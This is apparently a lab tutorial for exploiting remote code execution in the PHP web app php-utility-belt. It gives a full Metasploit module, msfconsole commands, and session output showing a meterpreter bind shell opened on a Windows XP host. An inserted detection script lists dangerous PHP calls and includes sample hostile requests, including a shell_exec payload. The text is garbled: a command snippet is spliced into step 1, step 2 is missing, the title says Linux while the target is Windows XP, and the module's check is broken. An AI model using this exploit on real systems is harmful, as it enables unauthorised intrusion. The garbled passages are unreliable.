Penetration: Exploiting php-utility-belt with Metasploit (Metasploit exploitation of a Linux system)

Reader submission 231 2022-10-02



Attacker: Kali 192.168.109.137

Target: Windows XP 192.168.109.141

Application: php-utility-belt (can be downloaded from the link)

1. Deploy php-utility-belt

Since php-utility-belt is a PHP application, a PHP environment is needed; for simplicity I installed WAMP directly.

Unzip php-utility-belt and place it under WAMP's $a = "net user"; echo shell_exec($a);?>');

3. Inspect the files under php-utility-belt

Now we find an extra file, info.php, under php-utility-belt.

We look at the contents of this file:

4. Visit info.php

Enter the address in the browser to visit info.php.

This lists all the users on the target machine, which shows that php-utility-belt is vulnerable.

5. Further analysis of the php-utility-belt vulnerability

Press F12 in Chrome or Firefox; analysing the page source shows that the contents of the text box are submitted by POST in the parameter `code`.

6. Write the attack script php_utility_belt_attack_by_binghe.rb

```ruby
##
# Author: 冰河 (binghe)
# Date: 2019-01-17
# Description: Metasploit exploit for php utility belt
##
require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP Utility Belt Remote Code Execution',
      'Description'    => %q{
        This module exploits a remote code execution vulnerability in P
      },
      'Author'         => [ 'binghe' ],
      'DisclosureDate' => '2019-01-17',
      'Platform'       => 'php',
      'Payload'        => {
        'Space'       => 2000,
        # The vulnerability is in a web application rather than a native program,
        # so set DisableNops to true to drop NOPs from the payload
        'DisableNops' => true
      },
      'Targets'        => [ ['PHP Utility Belt', {}] ],
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php']),
        OptString.new('CHECKURI', [false, 'Checking Purpose', '/php-utility-belt/info.php']),
      ], self.class)
  end

  def check
    # Write a probe file through the vulnerable 'code' parameter, then fetch it
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path),
      'vars_post' => { 'code' => "fwrite(fopen('info.php','w'), '');" }
    )
    resp = send_request_raw({ 'uri' => normalize_uri(datastore['CHECKURI']), 'method' => 'GET' })
    # A nil response means the probe file could not be fetched; otherwise look
    # for the phpinfo() marker in the body
    if resp && resp.body =~ /phpinfo\(\)/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    # Send the encoded PHP payload as the 'code' parameter; the application executes it
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path),
      'vars_post' => { 'code' => payload.encoded }
    )
  end
end
```
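As an added example that is not part of the original post and not Metasploit code, the following Ruby script shows the defender's side of steps 5 and 6: it scans request records for a POST to ajax.php whose `code` parameter calls command-execution or file-writing functions, and correlates it with a later GET for the .php file that snippet named. The record format and all sample requests are constructed assumptions for illustration.

```ruby
require 'cgi'

# Constructed sample request records (not captured from a real system), shaped
# like what a reverse proxy or WAF that logs POST bodies might emit.
SAMPLE_REQUESTS = [
  { method: 'POST', path: '/php-utility-belt/ajax.php',
    body: 'code=' + CGI.escape("fwrite(fopen('info.php','w'), 'x');") },
  { method: 'GET',  path: '/php-utility-belt/info.php', body: '' },
  { method: 'POST', path: '/php-utility-belt/ajax.php',
    body: 'code=' + CGI.escape('echo strtoupper("hello");') },
  { method: 'POST', path: '/php-utility-belt/ajax.php',
    body: 'code=' + CGI.escape('$a = "net user"; echo shell_exec($a);') },
].freeze

# PHP calls that execute commands, drop files or evaluate further code; their
# presence in the posted snippet is the signal we alert on.
DANGEROUS_CALLS = %w[eval assert system exec shell_exec passthru popen
                     proc_open fopen fwrite file_put_contents].freeze

# Names from DANGEROUS_CALLS that appear as function calls in a submitted snippet.
def risky_calls(code)
  DANGEROUS_CALLS.select { |fn| code.match?(/\b#{Regexp.escape(fn)}\s*\(/i) }
end

# The 'code' form field, or nil when the body has none.
def code_param(body)
  CGI.parse(body)['code'].first
end

# Walks the request sequence and returns one alert string per suspicious event:
# a POST to ajax.php whose snippet uses a dangerous call, and any later GET for
# a .php file that such a snippet named (the dropped-file follow-up).
def analyze(requests)
  alerts = []
  dropped = []
  requests.each_with_index do |req, i|
    if req[:method] == 'POST' && req[:path].end_with?('/ajax.php')
      code = code_param(req[:body])
      next if code.nil?
      calls = risky_calls(code)
      next if calls.empty?
      alerts << "##{i} POST #{req[:path]} code uses #{calls.join(', ')}"
      dropped.concat(code.scan(%r{['"]([\w./-]+\.php)['"]}).flatten)
    elsif req[:method] == 'GET' && dropped.any? { |f| req[:path].end_with?("/#{f}") }
      alerts << "##{i} GET #{req[:path]} fetches a file named in an earlier flagged snippet"
    end
  end
  alerts
end

puts analyze(SAMPLE_REQUESTS)
```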

7. Upload the attack script php_utility_belt_attack_by_binghe.rb

Upload php_utility_belt_attack_by_binghe.rb to the /usr/share/metasploit-framework/modules/exploits/web/php directory on Kali.

8. Run the attack script php_utility_belt_attack_by_binghe.rb

```
msfconsole
use exploit/web/php/php_utility_belt_attack_by_binghe
set payload php/meterpreter/bind_tcp
set RHOST 192.168.109.141
show options
exploit
sysinfo
```

The actual session looks like this:

```
msf > use exploit/web/php/php_utility_belt_attack_by_binghe
msf exploit(web/php/php_utility_belt_attack_by_binghe) > set payload php/meterpreter/bind_tcp
payload => php/meterpreter/bind_tcp
msf exploit(web/php/php_utility_belt_attack_by_binghe) > set RHOST 192.168.109.141
RHOST => 192.168.109.141
msf exploit(web/php/php_utility_belt_attack_by_binghe) > show options

Module options (exploit/web/php/php_utility_belt_attack_by_binghe):

   Name       Current Setting             Required  Description
   ----       ---------------             --------  -----------
   CHECKURI   /php-utility-belt/info.php  no        Checking Perpose
   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.109.141             yes       The target address
   RPORT      80                          yes       The target port (TCP)
   SSL        false                       no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /php-utility-belt/ajax.php  yes       The path to PHP Utility Belt
   VHOST                                  no        HTTP server virtual host

Payload options (php/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.109.141  no        The target address

Exploit target:

   Id  Name
   --  ----
   0   PHP Utility Belt

msf exploit(web/php/php_utility_belt_attack_by_binghe) > exploit

[*] Started bind TCP handler against 192.168.109.141:4444
[*] Sending stage (38247 bytes) to 192.168.109.141
meterpreter > sysinfo
Computer    : LIUYAZHUANG
OS          : Windows NT LIUYAZHUANG 5.1 build 2600 (Windows XP Professional Service Pack 3) i586
Meterpreter : php/windows
meterpreter >
```

At this point we have obtained a shell on the target machine, and further penetration operations can follow from here.

